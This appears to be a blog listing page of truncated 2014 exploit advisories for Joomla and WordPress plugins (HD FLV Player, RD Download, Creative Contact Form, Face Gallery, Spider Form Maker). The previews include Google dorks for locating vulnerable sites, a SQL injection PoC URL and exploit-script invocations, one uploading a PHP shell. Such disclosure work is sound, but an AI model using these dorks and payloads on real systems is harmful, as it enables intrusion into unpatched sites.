Joomla HD FLV Player SQL Injection Vulnerability

Info # Exploit Title : Joomla HD FLV Player 2.1.0.1 and below SQL Injection # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.hdflvplayer.net/ # # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5 # # Dork google 1: inurl:/component/hdflvplayer/ # Dork google 2: inurl:com_hdflvplayer # # Date : 2014-11-11 # # Tested on : BackBox 3.x/4.x # # Info: The variable "id" is not sanitized (again) # Over 80.000 downloads (statistic reported on official site) # # # Video Demo: http://youtu....

November 13, 2014 · 2 min · claudio

Joomla RD Download Sql Injection

claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http://127.0.0.1 _______ __ | _ .-----.-----.--------| .---.-. |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::.. . | `-------' _______ ______ ______ __ __ | _ | _ \ | _ \ .-----.--.--.--.-----| .-----.---.-.--| | |. l |. | \ |. | \| _ | | | | | | _ | _ | _ | |. _ |....

October 29, 2014 · 1 min · claudio

WordPress and Joomla Creative Contact Form Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress ___ ___ __ __,-,__ | Y .-----.----.--| .-----.----.-----.-----. | ' '__| |. | | _ | _| _ | _ | _| -__|__ --| | __| |. / \ |_____|__| |_____| __|__| |_____|_____| |_______| |: | _______ |__| __ |_| |::.|:. | | _ .-----.-----.--------| .---.-. `--- ---' |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::....

October 23, 2014 · 2 min · claudio

Joomla Face Gallery 1.0 Multiple Vulnerabilities

###################### # Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : https://www.apptha.com # Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150 # Dork Google: inurl:option=com_facegallery # Date : 2014-09-17 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Info: # Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file download vulnerabilities # PoC Exploit: # # http://localhost/index....

September 21, 2014 · 1 min · claudio

Joomla Spider Form Maker 3.4 and below SQL Injection

###################### # Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://web-dorado.com/ # Software Link : http://web-dorado.com/products/joomla-form.html # Dork Google: inurl:com_formmaker # Date : 2014-09-07 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi] "id" variable is not sanitized. ###################### # Vulnerability Disclosure Timeline: 2014-09-07: Discovered vulnerability 2014-09-09: Vendor Notification 2014-09-10: Vendor Response/Feedback 2014-09-10: Vendor Fix/Patch 2014-09-10: Public Disclosure ##################### Discovered By : Claudio Viviani http://www....

September 12, 2014 · 1 min · claudio